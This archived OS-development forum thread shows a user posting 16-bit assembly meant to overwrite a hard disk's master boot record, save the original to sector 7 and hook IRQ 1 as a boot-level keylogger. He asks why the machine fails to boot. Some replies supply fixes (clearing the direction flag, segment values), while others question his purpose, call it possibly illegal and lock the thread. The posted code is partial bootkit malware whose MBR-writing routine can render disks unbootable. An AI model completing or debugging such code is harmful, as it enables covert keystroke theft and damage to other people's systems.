Page 1 of 1
hook irq1 installed at MBR
Posted: Wed Jan 24, 2018 7:46 am
by Apolo
i am coding a program that hook teh IRQ 1 and is installed onto MBR and restore teh original MBR that is saved at sector 7 however the OS don't bootstrap. here is my code:
Code: Select all
org 100h
start:
MOV AX,201H
MOV BX,0E00H
MOV CX,1
MOV DX,80H
INT 13H
MOV AX,301H
MOV CX,7
INT 13H
MOV SI,int9_installer
MOV DI,0E00H
MOV CX,1FDH
REP MOVSB
ES
MOV WORD[0FFEH],0AA55h
MOV AX,301H
MOV CX,1
INT 13H
RET
int9_installer:
cli
push es
mov ax,0
mov es,ax
es
mov cx,[24h]
es
mov dx,[26h]
...
mov cx,0
mov dx,2000h
es
mov [24h],cx
es
mov [26h],dx
pop es
sti
...
mov si,3100h
mov al,10h
mov [si],al
mov al,0
mov [si+1],al
mov al,01
mov [si+2],al
mov al,0
mov [si+3],al
MOV AX,7C00H
mov [si+4],ax
mov ax,0h
mov [si+6],ax
mov ax,7
mov [si+8],ax
xor ax,ax
mov [si+0ah],ax
mov [si+0ch],ax
mov [si+0eh],ax
mov ah,42h
mov dl,80h
INT 13H
JMP 0:7C00H
Where is wrong at my code above???
Re: hook irq1 installed at MBR
Posted: Wed Jan 24, 2018 10:20 am
by iansjack
You don't initialize the segment registers, you don't initialize the direction flag, and you set the origin to 100h, which is almost certainly not what you intended. I'm not going to wade through the code to find other mistakes, but those ones need to be corrected first
Re: hook irq1 installed at MBR
Posted: Wed Jan 24, 2018 10:44 am
by AJ
Hi,
In addition to iansjack's post, we have eabsolutely no context for the code. You call this a "program". Does that mean that it is *not* running in a freestanding environment (which could also explain the org directive).
We also don't have a very good idea of what you expect to see compared with what you actually do see. Can you use some other tool to verify that the sectors are on disk where you expect them to be?
Cheers,
Adam
Re: hook irq1 installed at MBR
Posted: Wed Jan 24, 2018 11:22 am
by Apolo
my code is a keylogger that hook IRQ 1 and is installed onto MBR and teh original MBR is writed at sector 7 to be jmp after my keylogger is installed. org 100h directive is because is written in fasm. how to set direction flag and i should set segment registers to what value?
Re: hook irq1 installed at MBR
Posted: Wed Jan 24, 2018 11:30 am
by iansjack
I think you need to learn a little more about how the processor works, its state after reset, and the boot sequence before attempting this sort of program. Also, I'm not convinced that you understand the ORG directive.
And, I guess, the question is what are you attempting to achieve by hooking this interrupt. It is, potentially, something that I wouldn't feel comfortable helping with.
Re: hook irq1 installed at MBR
Posted: Wed Jan 24, 2018 9:58 pm
by Brendan
Hi,
Apolo wrote:my code is a keylogger that hook IRQ 1 and is installed onto MBR and teh original MBR is writed at sector 7 to be jmp after my keylogger is installed. org 100h directive is because is written in fasm. how to set direction flag and i should set segment registers to what value?
To clear the direction flag, use the CLD instruction.
The BIOS loads the MBR at "some combination of segment:offset that adds up to 0x0007C00". If you set ORG to 0x0100 (telling the assemebler to assume the "offset" for the start of your code will be 0x0100) then you'd need your segments to fulful the equation "0x0007C00 = (segment / 16) + 0x0100". That means you'd need to set segments to 0x07D0. Note that it's much easier to set ORG to 0x00007C00 and set all segments to zero.
For the rest, for assembly language there are only 2 kinds of bugs - the comments don't describe a correct algorithm, or the instructions don't match the comments. Your code has no comments and therefore your code is 100% bugs.
Finally; don't forget that all sane operating systems dispose of the BIOS early during boot and install their own (protected mode or long mode) device drivers with their own IRQ handlers; so (assuming things like TPM and "secureboot" don't do their job) your code still can't work.
Cheers,
Brendan
Re: hook irq1 installed at MBR
Posted: Thu Jan 25, 2018 5:19 am
by AJ
That last point is the most important for a keylogger. Any OS worth its salt will end up reinstalling an IDT and chances are your code will end up in an in-mapped memory page anyway.
You'd generally be better off with a hardware key logger but what you are doing may be at best immoral and at worst illegal
Before we go further, could you clarify the intention of what you are doing. If you're just playing with boot code on your own machine then fine.
Cheers,
Adam
Re: hook irq1 installed at MBR
Posted: Fri Jan 26, 2018 4:26 am
by Apolo
i think BIOS of my PCs is all infected because i try this code most simple but the PCs don't bootsrap however. see my most simple code:
Code: Select all
start:
MOV AX,201H
MOV BX,0E00H
MOV CX,1
MOV DX,80H
INT 13H
MOV CX,7
MOV AX,301H
INT 13H
MOV CX,1BDH
MOV SI,example
MOV DI,0E00H
REP MOVSB
MOV AX,301H
MOV BX,0E00H
MOV AX,301H
MOV CX,1
INT 13H
RET
example:
MOV AX,201H
PUSH ES
MOV BX,0
MOV ES,BX
MOV BX,7C00H
MOV CX,7
INT 13H
POP ES
cs
jmp bx
codesize:
Aaaaaaaaa! what is the problem of my code?
Re: hook irq1 installed at MBR
Posted: Fri Jan 26, 2018 5:15 am
by iansjack
The main problem is that you haven't told us what you are trying to do and why. Until we know that it is unlikely that you will get any further help on this forum. It's devoted to OS development, not hacking.
Re: hook irq1 installed at MBR
Posted: Fri Jan 26, 2018 5:24 am
by AJ
You one more attempt at explaining why you are doing this before the thread gets locked. If you are doing this for legit reasons, it sounds like an interesting problem to tackle, but we will also need more of a technical explanation. A bug in your code or methodology is much more likely than your BIOS being infected.
Cheers,
Adam
Re: hook irq1 installed at MBR
Posted: Fri Jan 26, 2018 5:31 am
by Apolo
resume:
i am trying to bootstrap from sector 7 that is where teh original MBR is writed. can someone help me?? i am desesperate!
Re: hook irq1 installed at MBR
Posted: Fri Jan 26, 2018 6:02 am
by AJ
Unfortunately locked as promised. I can only assume that this is being done for nefarious purposes...